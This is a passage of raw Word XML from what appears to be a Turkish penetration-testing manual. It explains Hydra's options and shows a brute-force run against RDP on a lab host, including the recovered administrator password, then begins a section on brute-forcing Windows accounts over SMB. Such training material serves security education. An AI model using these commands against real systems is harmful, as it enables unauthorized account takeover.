              <w:t>bilinen bir kullanıcı adı dene</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">mesi için </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>verilir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AACC397" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-L</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>parametresi ile i</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>çerisinde kullanıcı listesi bulunan dosya referans gösterilir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60D8658C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">: parametresi ile </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">bilinen bir parola değeri </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">denemesi </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">için </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>verilir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68BCA910" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">parametresi ile </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>içerisinde parola</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> listesi </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>bulunduran dosyanın referans gösteril</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ir</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28AEB8A9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-C</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">parametresi </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kullanıcı</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Adı/parola değerlerini arada “:” bulunacak şekilde barındıran bir dosyanın referans verilmesi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> için kullanılır.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51EEE9CF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-M</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>parametresi s</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>aldırı için kullanılacak IP adreslerini barındıran dosyanın referans verilmesi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> için kullanılır.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="558C8FCD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> -t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> hedef sisteme aynı anda kaç isteğin gönderil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">eceğini </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>belirleyen parametre</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>dir.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (varsayılan değer:16)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C759101" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B1ECFA2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="081035CC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bu uygulamada hedef sistemin IP adresi 192.168.20.108 dir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EC9292" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hedef sistemde RDP oturum bilgilerini ele geçirmek için kullanılacak kullanıcı adı Administrator’dür.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFE579" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bu uygulama için hydra kullanımı ve çıktısı aşağıda verilmiştir;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00D848DB" w14:paraId="3FA0C053" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="62D3254D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@kali:~/Desktop# hydra -l administrator -P wordlist.txt rdp://192.168.20.108</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="594AECB6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Hydra v7.6 (c)2013 by van Hauser/THC &amp; David Maciejak - for legal purposes only</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A67F7FB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71A1274E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-03 07:25:06</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E6DD458" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66781B4B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[DATA] 16 tasks, 1 server, 101 login tries (l:1/p:101), ~6 tries per task</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28BBF898" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[DATA] attacking service rdp on port 3389</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E3CABB8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[ERROR] Child with pid 3629 terminating, can not connect</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08949D25" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[ERROR] Child with pid 3630 terminating, can not connect</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485D4C1D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[ERROR] Child with pid 3628 terminating, can not connect</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E3DCCCD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[ERROR] Child with pid 3631 terminating, can not connect</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E6AD43" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[3389][rdp] host: 192.168.20.108   login: administrator   password: 123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2391C68C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>1 of 1 target successfully completed, 1 valid password found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A7AAF38" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-03 07:25:46</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14FF06D9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B66C61" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Burada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ki parametrelerden</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F688BE5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanıcı adını</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CBB50C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> parolaların </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bulunduğu </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dosyayı </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> veriyor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ED53B7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rdp://192.168.20.108</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hedef sisteme rdp protokolü üzerinden denemeler yapılacağını göstermektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B182D4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="34F4AF58" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="29F7A2E1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00902B70">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3063E6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc430104866"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.11. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:t>Windows Hesapl</w:t>
      </w:r>
      <w:r>
        <w:t>arını Smb Üzerinden Bruteforce i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:t>le Elegeçirme</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="07753BB2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377FE249" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Açıklama: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows işletim sistemlerinde bir kullanıcı sistem üzerinde herhangi bir işlem yapmadan önce sisteme giriş yapması gerekmektedir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ullanıcıların sisteme girişi smb protokü üzerinden gerçekleştirilmektedir. Windows sistemlerde varsayılan olarak kullanıcılar smb protolü üzerinden uzaktan da erişim elde edebilmektedirler. Windows 7 ve öncesi sistemler için kullanıcı adı ve parolasının elde edilen sistemlerin komut satırlarına uzaktan erişilebilmektedir. Tüm dosya sistemleri uzaktan kontrol edilebilmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4018D8B5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uygulama: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Saldırı aracı olarak hydra kullanılacaktır. Hedef sistemin oturum giriş bilgileri uzaktan elde edilmeye çalışılacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E732B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcı adı bilinen bir sistem için denecek bir parola için kullanımı;</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00D848DB" w14:paraId="09AEC7D5" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3AD5032D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>hydra –l kullanıcıAdı –p kullanıcıParolası protokol://hedefIPAdresi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E7A4ED" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1134DE8B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344A3BC2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>En sık kullanılan hydra parametreleri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00D848DB" w14:paraId="0E89BD0A" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
